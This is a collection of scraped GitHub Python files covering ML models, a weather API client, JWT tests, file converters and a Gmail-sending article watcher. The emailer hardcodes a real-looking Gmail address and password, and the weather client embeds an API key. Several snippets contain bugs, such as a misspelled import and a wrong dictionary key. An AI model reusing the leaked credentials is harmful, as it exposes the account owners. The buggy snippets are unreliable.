BioDataSet(feature_data_frame=df)\n\n''' \n get the user list from the dataset class object\n'''\n\nusers = tb_data.user_list\n\n''' \n generate tagged data set for each user\n'''\nData = dict()\nfor user in users:\n Data[user] = tb_data.get_data_set(user, neg_sample_sources=6, neg_test_limit=True)\n\n''' \n perform min max scaling and standard scaling\n'''\nmin_max_tuple = (0, 2)\nMinMaxData =dict()\nStandardScaleData = dict()\nfor user in Data:\n MinMaxData[user] = MinMaxScaling().operate(Data[user], min_max_tuple)\n StandardScaleData[user] = StandardScaling().operate(Data[users])\n\n''' \n perform dataset dimension reduction\n'''\n\nred_data = dict()\nfor us in Data:\n red_data[us] = PcaDimRed().operate(Data[us], n_components=13)\n","repo_name":"sohailhabib/SecurityMetrics","sub_path":"source_code/examples/dataset_preprocessing_usage.py","file_name":"dataset_preprocessing_usage.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34383971508","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def flatten(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n p = TreeNode(0)\n stack = []\n while True:\n while root != None:\n root.left, root.right = root.right, root.left\n p.right = root\n p = p.right\n stack.append(root)\n root = root.right\n if stack == []:\n return\n q = stack.pop()\n root = q.left\n q.left = None\n","repo_name":"TJZ1990/leetcode","sub_path":"Python/114-Flatten Binary Tree to Linked List-V1.py","file_name":"114-Flatten Binary Tree to Linked List-V1.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34940855244","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom backbone import resnet\n\n\nclass DepthwiseSeparableConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, dilation=1, bias=False):\n super(DepthwiseSeparableConv2d, self).__init__()\n self.depthwise_conv = nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=in_channels, bias=bias)\n self.depthwise_bn = nn.BatchNorm2d(in_channels)\n self.depthwise_activate = nn.ReLU()\n self.pointwise_conv = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, groups=1, bias=bias)\n self.pointwise_bn = nn.BatchNorm2d(out_channels)\n self.pointwise_activate = nn.ReLU()\n\n '''forward'''\n def forward(self, x):\n x = self.depthwise_conv(x)\n if hasattr(self, 'depthwise_bn'): x = self.depthwise_bn(x)\n if hasattr(self, 'depthwise_activate'): x = self.depthwise_activate(x)\n x = self.pointwise_conv(x)\n if hasattr(self, 'pointwise_bn'): x = self.pointwise_bn(x)\n if hasattr(self, 'pointwise_activate'): x = self.pointwise_activate(x)\n return x\n\n\nclass DepwiseSeparableASPP(nn.Module):\n def __init__(self, in_channels, out_channels, dilations, **kwargs):\n super(DepwiseSeparableASPP, self).__init__()\n self.parallel_branches = nn.ModuleList()\n for idx, dilation in enumerate(dilations):\n if dilation == 1:\n branch = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=dilation, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n else:\n branch = DepthwiseSeparableConv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=dilation, dilation=dilation, bias=False)\n self.parallel_branches.append(branch)\n self.global_branch = nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n self.bottleneck = nn.Sequential(\n nn.Conv2d(out_channels * (len(dilations) + 1), out_channels, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n self.in_channels = in_channels\n self.out_channels = out_channels\n\n def forward(self, x):\n size = x.size()\n outputs = []\n for branch in self.parallel_branches:\n outputs.append(branch(x))\n global_features = self.global_branch(x)\n global_features = F.interpolate(global_features, size=(size[2], size[3]), mode='bilinear',\n align_corners=False)\n outputs.append(global_features)\n features = torch.cat(outputs, dim=1)\n features = self.bottleneck(features)\n return features\n\n\nclass DeeplabV3Plus(nn.Module):\n def __init__(self, config, mode=\"train\", pretrain_base=False):\n super(DeeplabV3Plus, self).__init__()\n self.config = config\n self.mode = mode\n assert self.mode.upper() in ['TRAIN', 'TEST']\n self.backbone = resnet.__dict__[config.deeplab.backbone](pretrained=pretrain_base, outstride=self.config.deeplab.outstride)\n aspp_config = {\n 'in_channels': config.deeplab.aspp[\"in_channels\"],\n 'out_channels': config.deeplab.aspp[\"out_channels\"],\n 'dilations': config.deeplab.aspp[\"dilations\"],\n }\n self.aspp_net = DepwiseSeparableASPP(**aspp_config)\n shortcut_config = config.deeplab.shortcut\n self.shortcut = nn.Sequential(\n nn.Conv2d(shortcut_config['in_channels'], shortcut_config['out_channels'], kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(shortcut_config['out_channels']),\n nn.ReLU()\n )\n decoder_cfg = config.deeplab.decoder\n self.decoder = nn.Sequential(\n DepthwiseSeparableConv2d(decoder_cfg['in_channels'], decoder_cfg['out_channels'], kernel_size=3, stride=1, padding=1, bias=False),\n DepthwiseSeparableConv2d(decoder_cfg['out_channels'], decoder_cfg['out_channels'], kernel_size=3, stride=1, padding=1, bias=False),\n nn.Dropout2d(decoder_cfg['dropout']),\n nn.Conv2d(decoder_cfg['out_channels'], config.data.num_classes, kernel_size=1, stride=1, padding=0)\n )\n\n def load_backbone_checkpoint(self, state_dict, strict=True):\n self.backbone.load_state_dict(state_dict, strict=strict)\n\n def forward(self, x):\n img_size = x.size(2), x.size(3)\n # feed to backbone network\n backbone_outputs = self.backbone(x)\n # feed to aspp\n aspp_out = self.aspp_net(backbone_outputs[-1])\n aspp_out = F.interpolate(aspp_out, size=backbone_outputs[0].shape[2:], mode='bilinear',\n align_corners=True)\n # feed to shortcut\n shortcut_out = self.shortcut(backbone_outputs[0])\n # feed to decoder\n feats = torch.cat([aspp_out, shortcut_out], dim=1)\n predictions = self.decoder(feats)\n predictions = F.interpolate(predictions, size=img_size, mode='bilinear', align_corners=True)\n return predictions","repo_name":"pUmpKin-Co/offical-IndexNet","sub_path":"deeplabv3plus/deeplabc3_plus.py","file_name":"deeplabc3_plus.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"5354274300","text":"import csv\r\nimport pickle\r\n\r\nprint(\"\"\"Would you like to:\r\n1 - Convert .csv to .dab\r\n2 - Convert .dab to .csv\"\"\")\r\nchoice = input(\">\")\r\nprint()\r\n\r\nif choice == \"1\":\r\n file = input(\"What csv file would you like to read?\\n>\")\r\n file += \".csv\"\r\n name = input(\"What would you like to call your file?\\n>\")\r\n name += \".dab\"\r\n\r\n with open(file) as csvf:\r\n a = csv.reader(csvf)\r\n b = [i for i in a if i != []]\r\n out_file = open(name,\"wb\")\r\n pickle.dump(b, out_file)\r\n print(\"dumped:\\n\" + str(b))\r\n out_file.close()\r\nelif choice == \"2\":\r\n file = input(\"What dab file would you like to read?\\n>\")\r\n file += \".dab\"\r\n name = input(\"What would you like to call your file?\\n>\")\r\n name += \".csv\"\r\n\r\n in_file = open(file, \"rb\")\r\n data = pickle.load(in_file)\r\n new_data = [i for i in data if i != []]\r\n in_file.close\r\n\r\n with open(name, 'w') as csvf:\r\n writer = csv.writer(csvf)\r\n for row in data: \r\n writer.writerow(row)\r\n print(\"added:\", row)\r\nelse:\r\n print(\"Invalid Choice\")\r\n \r\nenter = input(\"Press Enter to Continue...\")\r\n","repo_name":"talcosaurusrex/vocab-depressed","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7671456313","text":"import requests\nfrom requests.exceptions import HTTPError\nimport time\nimport os\nimport json\nfrom googletrans import Translator\nimport numpu\nclass OpenWeatherApi:\n\n __APPID = \"b6731c567cf35bb7de231f7ccaab085c\"\n __timers = {'forecast': 60 * 60 * 2,\n 'weather': 60 * 10\n }\n\n def __init__(self, connection=True):\n self.translator = Translator()\n\n def _dump(self, data, data_name, city):\n with open('{0}_fixture_{1}_time.txt'.format(data_name, city), 'w') as f:\n print(time.time())\n f.write(str(time.time()))\n with open('{0}_fixture_{1}.txt'.format(data_name, city), 'w') as f:\n json.dump(data, f)\n\n def _load_data(self, data_name, city) -> dict:\n with open('{0}_fixture_{1}.txt'.format(data_name, city), 'r') as f:\n return json.load(f)\n\n def _load_time(self, data_name, city):\n with open('{0}_fixture_{1}_time.txt'.format(data_name, city), 'r') as f:\n return float(f.read())\n\n def get_raw_data(self, data_name, city) -> dict:\n file_path = './{0}_fixture_{1}.txt'.format(data_name, city)\n if os.path.exists(file_path):\n t = self._load_time(data_name, city)\n if time.time() - t < self.__timers[data_name]:\n return self._load_data(data_name, city)\n\n url = \"http://api.openweathermap.org/data/2.5/{0}\".format(data_name)\n response = requests.get(url, params={'q': city, 'lang': 'ru', 'units': 'metric', 'APPID': self.__APPID})\n try:\n response.raise_for_status()\n except HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}')\n return None\n except Exception as err:\n print(f'Other error occurred: {err}')\n return None\n else:\n data = response.json()\n self._dump(data, data_name, city)\n return response.json()\n\n def get_weather(self, city):\n data = self.get_raw_data('weather', self.translator.translate(city, dest='en').text)\n if data == None:\n return 'Got problems on server'\n answer = 'Погода в {0}\\n' \\\n 'Температура {1} С°\\n' \\\n 'Ощущается как {2} С°\\n' \\\n 'Относительная влажность {3}%\\n' \\\n 'Скорость ветра {4} м/c\\n' \\\n '{5}\\n'.format(data['name'],\n data['main']['temp'],\n data['main']['feels_like'],\n data['main']['humidity'],\n data['wind']['speed'],\n data['weather'][0]['description'].capitalize()\n )\n return answer\n\n def get_forecast(self, city):\n data = self.get_raw_data('forecast', self.translator.translate(city, dest='en').text)\n if data == None:\n return 'Got problems on server'\n n = 3\n answer = 'Прогноз погоды в {0} на ближайшие несколько часов:'.format(data['city']['name'], n * 3)\n for i in range(1, n+1):\n dl = data['list'][i]\n answer += '\\nОжидается на {0}:\\n' \\\n 'Температура {1} С°\\n' \\\n 'Ощущается как {2} С°\\n' \\\n 'Относительная влажность {3}%\\n' \\\n 'Скорость ветра {4} м/c\\n' \\\n '{5}\\n'.format(dl['dt_txt'],\n dl['main']['temp'],\n dl['main']['feels_like'],\n dl['main']['humidity'],\n dl['wind']['speed'],\n dl['weather'][0]['description'].capitalize()\n )\n return answer\n\n##################################################################################\n\ndef main():\n weather_api = OpenWeatherApi()\n print(weather_api.get_weather('Moscow'))\n print(weather_api.get_forecast('Moscow'))\n\nif __name__ == '__main__':\n main()\n","repo_name":"captainum/WeatherApi","sub_path":"city.py","file_name":"city.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19817333680","text":"from datetime import datetime, timedelta\n\nimport pytest\nfrom jose import jwt, JWTError\n\nfrom src.config import SecuritySetting\nfrom src.schemas.users import User\nfrom src.security.JwtConverter import JwtConverter\n\nexp_time = timedelta(minutes=15)\ntest_secret = \"yqWlVAiIgqm1nqc5SEa1aM7C6lJ8JTrZ\"\n\n\n@pytest.fixture\ndef get_jwt():\n claims = {\n \"iss\": \"ska_checklist\",\n \"iat\": datetime.utcnow(),\n \"exp\": datetime.utcnow() + exp_time,\n \"username\": \"test_user\",\n \"is_superuser\": \"true\"\n }\n return jwt.encode(claims=claims, key=test_secret)\n\n@pytest.fixture\ndef get_exp_jwt():\n claims = {\n \"iss\": \"ska_checklist\",\n \"iat\": datetime.utcnow() - timedelta(minutes=16),\n \"exp\": datetime.utcnow() - timedelta(minutes=1),\n \"username\": \"test_user\",\n \"is_superuser\": \"true\"\n }\n return jwt.encode(claims=claims, key=test_secret)\n@pytest.fixture\ndef get_dummy_config():\n return SecuritySetting(jwt_secret=test_secret)\n\n@pytest.fixture\ndef get_user() -> User:\n return User(id=1,\n is_superuser = True,\n created_at = datetime.utcnow(),\n username=\"test_user\",\n name=\"John\",\n surname=\"Doe\",\n )\n\n@pytest.fixture\ndef converter(get_dummy_config, get_dummy_dao) -> JwtConverter:\n return JwtConverter(userdao=get_dummy_dao, config=get_dummy_config)\n\n\ndef test_exchange_jwt_to_user(get_jwt, converter: JwtConverter):\n user: User = converter.get_user(get_jwt)\n\n assert user.username == \"test_user\"\n assert user.name == \"John\"\n\ndef test_expired_jwt(get_exp_jwt, converter: JwtConverter):\n with pytest.raises(JWTError):\n user: User = converter.get_user(get_exp_jwt)\n\ndef test_wrong_jwt_signature(converter):\n with pytest.raises(JWTError):\n user: User = converter.get_user(\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c\")\n\ndef test_exchange_user_to_jwt(get_user, converter):\n token = converter.get_jwt(get_user)\n\n decoded = jwt.decode(token=token, key=test_secret)\n\n assert decoded.get(\"username\") == \"test_user\"\n assert decoded.get(\"is_superuser\") == True","repo_name":"atlomak/check_list","sub_path":"tests/security/test_jwtConverter.py","file_name":"test_jwtConverter.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6540991878","text":"import torch\nimport torch.nn as nn\n\n# https://www.youtube.com/watch?v=ovB0ddFtzzA&t=876s\n\nclass patchembed(nn.Module):\n \"\"\" 원본이미지 -> 패치이미지로 만듬 패치 이미지 임베드\n \n Paramters\n ---------\n img_size : int\n 이미지의 사이즈 (정사각형)\n 변수값 들어갈때는 (img_size,img_size)로 들어감\n \n patch_size : int\n 패치가 될 사이즈\n 변수값 들어갈때는 (patch_size,patch_size)로 들어감\n \n int_chans : int\n 입력이미지 채널수\n \n embed_dim : int\n 임베딩할 차원\n\n \"\"\"\n def __init__(self,img_size,patch_size,int_chans=3,embed_dim=768) -> None:\n super().__init__()\n self.img_size = img_size\n self.patch_size = patch_size\n \n ## 패치 갯수\n self.n_patches = (img_size // patch_size)**2\n\n self.proj = nn.Conv2d(int_chans,embed_dim,kernel_size=patch_size,stride=patch_size)\n \n def forward(self,x):\n \"\"\" 피드포워드 계산\n \n Parameters\n -----------\n x : torch.Tensor\n 모양 '(배치,채널수,이미지사이즈,이미지사이즈)'\n \n Returns\n -------\n torch.tensor\n 모양 '(배치,패치갯수,임베딩 차원)'\n \n \"\"\"\n \n x = self.proj(x)\n x = x.flatten(2) # (배치,임배딩차원수,패치수)\n x = x.transpose(1,2) # (배치,패치수,임배딩차원수)\n return x\n \n \nclass Attention(nn.Module):\n \"\"\" 어텐션 메커니즘\n Parameters\n ----------\n dim : int\n 인풋 차원\n \n n_heads : int\n 어텐션 메카니즘 헤더 갯수\n\n qkv_bias : bool\n 쿼리,키,벨류 바이어스 변수 설정할건지\n \n attn_p : float\n 드롭아웃 확률 (쿼리,키,벨류)\n \n proj_p : float\n 드롭아웃 확률 (출력 텐서) \n \n \n Attributes\n ----------\n scale : float\n 노멀라이징 \n qkv : nn.Linear\n 키,쿼리,벨류\n \n proj : nn.Linear\n 어텐션 값들 덴스레이어\n \n attn_drop, proj_drop : nn.Dropout\n 드롭아웃 레이어 \n \"\"\"\n \n def __init__(self,dim,n_heads=12,qkv_bias=True,attn_p=0.,proj_p=0.) -> None:\n super().__init__()\n self.n_heads = n_heads\n self.dim = dim\n self.head_dim = dim // n_heads # 멀티헤드 어텐션 헤드는... 인코더의 전체차원에서 n_heads만큼 나누어줌\n self.scale = self.head_dim ** -0.5 ## 어텐션 벡터 스케일링\n \n \n \n self.query = nn.Linear(dim, dim)\n self.key = nn.Linear(dim, dim)\n self.value = nn.Linear(dim, dim)\n \n \n \n self.qkv = nn.Linear(dim,dim*3,bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_p)\n self.proj = nn.Linear(dim,dim) ## 멀티헤더 어텐션은 입력,출력 차원의 갯수는 똑같음\n self.proj_drop = nn.Dropout(proj_p)\n \n def forward(self,x):\n \"\"\" 전방향 연산 시작, (멀티헤더 어텐션은 입력,출력 차원의 갯수는 똑같음)\n \n Parameters\n ----------\n x : torch.Tensor\n 모양 '(배치,패치수+1,dim)'\n 패치수+1은 앞에 클래스 토큰\n \n Returns\n -------\n torch.Tensor\n 모양 '(배치,패치수+1,dim)'\n \n \"\"\"\n # https://paperswithcode.com/method/multi-head-attention 그림 참조할것\n \n \n ## 배치수, 패치수, x의 차원\n ## 여기서 패치수는 임베딩된 벡터라 하나의 토큰으로 보아도 무방함\n n_samples, n_tokens, dim = x.shape\n \n \n ## 멀티헤더 셀프 어텐션은 입력과 출력의 차원이 같아야하는데 맞지 않다면 오류임 \n if dim != self.dim:\n raise ValueError\n \n\n \n \n ################ 지우자\n # q = self.query(x)\n # # q = torch.Size([512, 65, 128]) \n # q = q.view(batch_size, -1, self.n_heads, self.head_dim).permute(0,2,1,3)\n # # q = torch.Size([512, 8, 65, 16])\n ################\n \n \n\n\n ## qkv를 한꺼번에 계산 \n qkv = self.qkv(x) # 입력 : (배치,패치수+1,임베딩 차원) 출력 : (배치,패치+1,3*임베딩 차원)\n # qkv = torch.Size([512, 65, 384])\n \n # 한꺼번에 계산한거-> 리쉐이프\n ## -> 여기에는 키,쿼리 벨류를 해더로 나누어줌\n qkv = qkv.reshape(n_samples,n_tokens,3,self.n_heads,self.head_dim) # (배치,패치수+1,3,해더수,해더 차원)\n ## 헤더별로 가져오기 편하게 차원 바꾸어줌\n ## 3을 맨앞으로...\n qkv = qkv.permute(2,0,3,1,4) # (3,배치,해더수,패치수+1,해더 차원) \n \n \n ## 쿼리,키,벨류 값 가져오기\n q,k,v = qkv[0],qkv[1],qkv[2]\n # q= torch.Size([512, 8, 65, 16])\n # 배치,헤더수,패치수, 헤더 차원수\n \n \n ## 키값 전치행렬\n k_t = k.transpose(-2,-1) # (배치,해더수,해더차원,패치수+1)\n # k_t = torch.Size([512, 8, 16, 65])\n # k = torch.Size([512, 8, 65, 16])\n \n \n \n ## 쿼리,키 행렬을 곱하고 스케일 조정\n dp = (q@k_t) * self.scale # (배치,해더수,패치수+1,패치수+1)\n ## 어텐션 맵 만듬 (소프트 맥스 & 드롭아웃)\n # dp = torch.Size([512, 8, 65, 65])\n attn = dp.softmax(dim=-1)\n attn = self.attn_drop(attn)\n \n \n \n ## V를 어텐션 스코어 값으로 곱함\n # weighted_avg = torch.Size([512, 8, 65, 16])\n weighted_avg = attn @ v # (배치,해더수,패치수+1,해더차원)\n \n # weighted_avg = torch.Size([512, 65, 8, 16])\n weighted_avg = weighted_avg.transpose(1,2) # (배치,패치수+1,해더수,해더차원)\n \n ## 해더수(행)만큼 나누어진 값들을 일자로 펴줌-> concat의 의미도 있음\n weighted_avg = weighted_avg.flatten(2) # (배치,패치수+1,헤더수*헤더차원) => (배치,패치수+1,임베딩 차원)\n # weighted_avg = torch.Size([512, 65, 128])\n \n x = self.proj(weighted_avg)\n x = self.proj_drop(x)\n \n \n return x,q,k,v\n \nclass MLP(nn.Module):\n \"\"\" 멀티 레이어\n \n Parameters\n ----------\n in_features: int\n 입력데이터 사이즈\n \n hidden_feactures : int\n 히든 레이어 갯수\n \n out_feactures : int\n 출력 사이즈\n \n p : float\n 드롭아웃 확률\n \n \"\"\"\n def __init__(self,in_features,hidden_feactures,out_feactures,p=0.):\n super().__init__()\n self.fc1 = nn.Linear(in_features,hidden_feactures)\n self.act = nn.GELU()\n self.fc2 = nn.Linear(hidden_feactures,out_feactures)\n self.drop = nn.Dropout(p)\n \n def forward(self,x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.fc2(x)\n x = self.drop(x)\n \n return x\n \n \n \nclass Block(nn.Module):\n \"\"\" 트랜스 포머 블럭\n \n Parameters\n ----------\n dim : int\n 임베딩 차원\n \n n_heads : int\n 어텐션 해더 갯수\n \n mlp_ratio : float\n 'dim'에 대한 'MLP' 모듈의 숨겨진 차원 크기를 결정\n \n qkv_bias : bool\n 키,쿼리,블럭 바이어스 변수 설정\n \n p, attn_p : float\n 드롭아웃 확률\n \n \n \"\"\"\n def __init__(self,dim,n_heads,mlp_ratio=4.0,qkv_bias=True,p=0,attn_p=0):\n super().__init__()\n self.norm1 = nn.LayerNorm(dim, eps=1e-6)\n self.attn = Attention(dim,n_heads=n_heads,qkv_bias=qkv_bias,attn_p=attn_p,proj_p=p)\n self.norm2 = nn.LayerNorm(dim,eps=1e-6)\n \n ## MLP레이어 임베딩차원은 -> 트랜스포머의 출력 벡터의 4배로 \n hidden_feactures = int(dim*mlp_ratio)\n self.mlp = MLP(\n in_features=dim,\n hidden_feactures=hidden_feactures,\n out_feactures=dim,\n )\n \n def forward(self,x):\n z,q,k,v = self.attn(self.norm1(x))\n x = x + z\n x = x + self.mlp(self.norm2(x))\n \n return x , q,k,v\n \n \nclass Vit(nn.Module):\n def __init__(self,\n img_size=256,\n patch_size=16,\n in_chans=3,\n n_classes=1000,\n embed_dim=768,\n depth=1,\n n_heads=12,\n mlp_ratio=4.,\n qkv_bias=False,\n p=0.,\n attn_p=0., \n ):\n super().__init__()\n \n self.patch_embed = patchembed(\n img_size=img_size,\n patch_size=patch_size,\n int_chans=in_chans,\n embed_dim=embed_dim\n )\n \n ## 임베드 벡터의 맨앞에 붙일 클래스 토큰\n self.cls_token = nn.Parameter(torch.zeros(1,1,embed_dim))\n \n ## 포지션 파라미터들\n self.pos_embed = nn.Parameter(torch.zeros(1,1+self.patch_embed.n_patches,embed_dim))\n \n self.pos_drop = nn.Dropout(p=p)\n \n self.blocks = nn.ModuleList(\n [\n Block(\n dim = embed_dim,\n n_heads=n_heads,\n mlp_ratio=mlp_ratio,\n qkv_bias=qkv_bias,\n p=p,\n attn_p=attn_p, \n )\n for _ in range(depth)\n ]\n )\n \n self.norm = nn.LayerNorm(embed_dim,eps=1e-6)\n self.head = nn.Linear(embed_dim,n_classes)\n \n def forward(self,x):\n ## 배치수\n n_samples = x.shape[0]\n x = self.patch_embed(x)\n \n cls_token = self.cls_token.expand(n_samples,-1,-1) # (배치,1,임베드차원)\n \n ## cls 토큰을 붙임\n x = torch.cat((cls_token,x),dim=1)\n \n x = x + self.pos_embed # (qocl,1+패치수,임베딩차원)\n x = self.pos_drop(x)\n \n for block in self.blocks:\n x,q,k,v = block(x) \n # x = block(x)\n \n x = self.norm(x)\n \n cls_token_final = x[:,0] # vit 마지막 결과값 가져옴\n x = self.head(cls_token_final)\n \n return x ,q,k,v\n \n ## 데이터 로더\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch\nfrom torch.utils.data import DataLoader\n\nimg_size = 32\nbatch_size = 512\n\nmean = (0.4914, 0.4822, 0.4465)\nstd = (0.2023, 0.1994, 0.2010)\ntrain_transform = transforms.Compose([transforms.Resize(img_size), transforms.RandomCrop(img_size, padding=2),\n transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize(mean, std)])\ntest_transform = transforms.Compose([transforms.Resize(img_size), transforms.ToTensor(),\n transforms.Normalize(mean, std)])\n\ntrainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=train_transform)\nvalset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=test_transform)\n\n\ntrainloader = DataLoader(trainset, batch_size=batch_size)\nvalloader = DataLoader(valset, batch_size=batch_size, shuffle=False)\n\n# 모델 선언\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel = Vit(img_size=img_size,patch_size=4,in_chans=3,n_classes=10,embed_dim=128,n_heads=8,depth=1)\n\n# model = Vit(img_size=img_size,patch_size=4,in_chans=3,n_classes=10)\n\nmodel.to(device)\n\n# 학습\nimport torch.optim as optim\nepochs = 100\nlr = 0.001\nweight_decay = 0\n\ninterver=40\n\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n\nfor epoch in range(0,epochs):\n \n \n model.train()\n \n running_loss = 0\n total_correct = 0\n for i,(img,target) in enumerate(trainloader):\n optimizer.zero_grad() # model의 gradient 값을 0으로 설정\n \n outputs , q,k,v = model(img.to(device))\n \n \n loss = criterion(outputs, target.to(device))\n loss.backward() # backward 함수를 호출해 gradient 계산\n optimizer.step() # 모델의 학습 파라미터 갱신\n \n running_loss += loss.item() / len(trainloader)\n \n _, predicted = torch.max(outputs, 1)\n correct = (predicted == target.to(device)).sum().item() \n total_correct += correct\n \n if i % interver ==0:\n # print(f'[{epoch}\\t{len(trainloader)}/{i}]\\t loss : {loss:.4f} \\t accuracy : {correct/batch_size*100:.2f}% \\t{correct}/{batch_size}') \n pass\n\n # print(f\"{epoch} epoch 평균\\tloss : {running_loss} \\t accuracy : {total_correct/(batch_size*len(trainloader))*100:.2f}% \\t {total_correct}/{batch_size*len(trainloader)}\")\n # print(\"\\n\")\n \n","repo_name":"kwon-jaehong/pytorch_vit","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":13286,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41762926584","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport requests\nimport time\nimport smtplib\nfrom email.mime.text import MIMEText\n\ndef sendEmail(title,message,destination):\n\n fromaddress = 'ringlgamesh@gmail.com'\n toaddress = destination\n\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login('ringlgamesh@gmail.com','Google#9527')\n\n msg = MIMEText(message)\n msg['From'] = fromaddress\n msg['To'] = toaddress\n msg['Subject'] = (title)\n\n server.sendmail(fromaddress,toaddress,msg.as_string())\n server.quit\n\n#ID = requests.get('https://www.iyingdi.cn/feed/list/seed/v2?web=1&seed=2&system=web').json().get('feeds')[0].get('feed').get('sourceID')\nID = None\n\nwhile True: \n\n Time = time.localtime()\n \n if Time.tm_sec == 0:\n\n FEED = requests.get('https://www.iyingdi.cn/feed/list/seed/v2?web=1&seed=2&system=web').json().get('feeds')[0].get('feed')\n tmp = FEED.get('sourceID')\n\n if tmp != ID:\n title = FEED.get('title')\n description = FEED.get('description')\n mailTitle = '炉石新文章:'+title.encode('utf-8')\n mailContent = description.encode('utf-8')\n sendEmail(mailTitle,mailContent,'582981961@qq.com')\n ID = tmp\n\n time.sleep(1)\n","repo_name":"FinchChen/bilibili","sub_path":"旅法师文章更新检测.py","file_name":"旅法师文章更新检测.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18614610468","text":"'''\nMain indexing process:\ninitialing UniGramIndexer class inputs the corpus's path\nwrite_inverted_index inputs the path where the index is going to be saved. For this project, save the index under the\ndirectory of the related corpus\n'''\n\nfrom src.Indexer import UniGramIndexer\n\n\nclass Indexing:\n def main(self, path): # path = ../corpus with stopping'\n indexer = UniGramIndexer(path)\n indexer.uni_gram_indexer()\n indexer.write_inverted_index(path + '/index')\n","repo_name":"ethanZHY/Basic-Search-Engine","sub_path":"src/indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4651135130","text":"import pygame\nfrom pygame.locals import Color\n\n__author__ = 'Sam'\n\n# todo: port to https://github.com/tipam/pi3d\n# todo: make this file thread-safe (VERY IMPORTANT!!! Board crashes otherwise!)\n\nclass TextRendererBase():\n def __init__(self):\n self._image = None\n self._rect = None\n\n def _render(self):\n self._rect = self._image.get_rect()\n\n def render(self, screen, x, y, text=None):\n pass\n\n def render_width(self):\n if self._image is None:\n self._render()\n return self._rect.width\n\n def render_height(self):\n if self._image is None:\n self._render()\n return self._rect.height\n\n\nclass TextImg(TextRendererBase):\n def __init__(self, font=None, color=\"white\", size=32):\n TextRendererBase.__init__(self)\n self._color = color\n if isinstance(color, basestring):\n self._color = Color(color)\n self._text = None\n self._font = font if font is not None else pygame.font.Font(pygame.font.match_font('Arial'), size)\n\n def _render(self):\n self._image = self._font.render(self._text, True, self._color)\n self._image.set_alpha(self._color.a) # todo - this doesn't work?\n self._rect = self._image.get_rect()\n\n def set_text(self, text):\n if text != self._text:\n self._text = unicode(text)\n self._image = None\n\n def get_text(self):\n return self._text\n\n def set_color(self, color):\n self._color = Color(color)\n self._image = None\n\n def render(self, screen, x, y, text=None):\n if text is not None:\n self.set_text(text)\n if self._image is None:\n self._render()\n self._rect.topleft = (x, y)\n screen.blit(self._image, self._rect, special_flags=0)\n\n\nclass MultiColoredTextImg():\n def __init__(self, font=None, colors=(), parts=None):\n self.width = 0\n self.height = 0\n if parts is not None:\n self._parts = parts\n else:\n self._parts = []\n for color in colors:\n self._parts.append(TextImg(font, color))\n\n def set_text(self, index, text):\n self._parts[index].set_text(text)\n\n offset = 0\n for part in self._parts:\n offset += part.render_width()\n self.height = part.render_height()\n self.width = offset\n\n def render(self, screen, x, y):\n offset = 0\n for part in self._parts:\n part.render(screen, x + offset, y)\n offset += part.render_width()\n\n\nclass OutlinedTextImg(TextRendererBase):\n def __init__(self, font=None, color=\"white\", size=32, outercolor=\"black\", outlinesize=1):\n 